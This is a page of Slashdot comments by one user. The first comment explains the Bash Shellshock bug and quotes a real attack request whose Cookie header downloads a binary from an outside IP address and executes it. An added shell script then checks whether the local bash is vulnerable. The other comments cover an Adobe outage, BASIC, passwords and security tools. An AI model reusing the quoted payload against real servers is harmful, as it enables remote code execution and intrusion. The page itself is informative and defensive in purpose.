Comment: Yes it is being exploited (Score 5, Informative) 316

by xanthos (#47996085) Attached to: Flurry of Scans Hint That Bash Vulnerability Could Already Be In the Wild

There is evidence that this is being exploited in the wild.
Nginx and Apache servers using mod_cgi are two potentially vulnerable services.

The risk is that it is possible to modify environment variables which then could allow the execution of arbitrary code with the permissions of the parent process.

An example attack:

GET / HTTP/1.0 User-Agent: Thanks-Rob Cookie: () { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;

Over at the Internet Storm Center http://isc.sans.org/ they have been updating their advisory and have a simple one-liner to test if a system is vulnerable.
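An added example, not part of the comment above and not the ISC one-liner itself, showing the kind of local check it performs: the function places a bash function definition with a trailing command into an arbitrary environment variable and reports whether the child bash ran that trailing command. The variable name "probe" and the marker string are choices made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): report whether the local bash
# runs a command appended to a function definition that it imports from the
# environment, which is the behaviour the comment above describes.

shellshock_status() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    # Marker that should only appear if bash executed the trailing command.
    marker="SHELLSHOCK_MARKER_$$"
    # The value is a (harmless) function body followed by a trailing "echo".
    # The child shell is only asked to run 'true'; a vulnerable bash parses the
    # definition at startup and also executes the trailing command, so the
    # marker shows up on stdout. A patched bash ignores the variable entirely
    # (older partial fixes emit a warning on stderr, which is discarded here).
    out=$(env "probe=() { :;}; echo $marker" bash -c 'true' 2>/dev/null)
    case "$out" in
        *"$marker"*) echo "vulnerable" ;;
        *)           echo "patched" ;;
    esac
    return 0
}

# Stand-alone usage: print the result and exit non-zero if vulnerable,
# so the check can be dropped into a fleet audit script.
if [ "${0##*/}" = "shellshock_check.sh" ]; then
    status=$(shellshock_status)
    echo "bash status: $status"
    [ "$status" != "vulnerable" ] || exit 1
fi
```

The same env-variable trick, with a header value instead of a shell variable, is what the quoted request above relies on, which is why CGI front ends that copy request headers into the environment were the first targets.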

Comment: Adobe better take a look at their SLA (Score 3, Insightful) 74

by xanthos (#47018895) Attached to: Adobe Creative Cloud Is Back

If one of our sites was down for as long as Adobe's was, heads would roll.

What took so long to restore? Crappy process for restoring server images or recovering a database?

Or, as others have speculated, was there a security breach and they couldn't bring it back up until all the evidence was gathered and the vulnerability was closed?

Oh wait, this is Adobe we are talking about. Their code doesn't have vulnerabilities.

Comment: Remember, the B in BASIC is for Beginners (Score 1) 146

by xanthos (#46707301) Attached to: Born To RUN: Dartmouth Throwing BASIC a 50th B-Day Party

Surprised at the number of hateful comments regarding BASIC. Even when it was created it was aimed at novices, not experts, hence the name: Beginners' All-purpose Symbolic Instruction Code. The true value was that the simple syntax made learning programming concepts much simpler. I used to teach a beginning programming class in the '80s that used BASIC. I always felt that I was able to instill a better understanding of what was going on with the simple Line # VERB parameter syntax of the early language. Breaking things down to only four verb types (Definition, Assignment, I/O, Control), the operators, and the two types of variables/constants (string/numeric). That's all there is, folks. Would I want to try and write a compiler in it? No, but that is not what the language was written for.

Dinosaur trivia points: why do loops commonly use the variable i? (Hint: int does not stand for index.)

Comment: False Conclusion (Score 1) 299

by xanthos (#45576993) Attached to: Why People Are So Bad At Picking Passwords

I hate studies like this. Do people pick common passwords? Of course they do. Does everyone pick an easy-to-guess password? Of course not. Can it be blindly determined, for any given user, if their password is "simple" or "complex"? No.

The article puts the blame on the end user, when the truth is the problem is with the websites storing the passwords in plain text or as un-salted hashes and not locking out brute force attacks. What the researchers are really arguing is that
    1) your account may be compromised if hackers break into the website and steal all the passwords.
    2) your password might be easier to guess if it is related to you, hackers are targeting you personally (not likely), and the website doesn't lock the account out.

Don't blame the user, blame the developers and administrators for being lazy and/or inept and failing to protect people from themselves.

Comment: Olivetti! (Score 2) 623

by xanthos (#43852217) Attached to: How Did You Learn How To Program?

I started about the same time on an Olivetti 401, I believe. A glorified numeric keypad for input and a red light, a green light and a cash-register-style tape for output.

I believe you will never really understand how a computer works until you have done two things:
built a compiler/parser and have done machine language programming (which was what you did with the 401).

Comment: Go check out sectools.org (Score 2) 116

by xanthos (#43282603) Attached to: Ask Slashdot: Do-It-Yourself Security Auditing Tools?

Sectools.org has a comprehensive list of tools with explanations of what each one does. Look at the web tools and the vulnerability scanners and you will find something you feel comfortable using. Most of the other tools mentioned so far can be found there. Also, the Open Web Application Security Project (owasp.org) has some good information on secure app development.

Good luck.
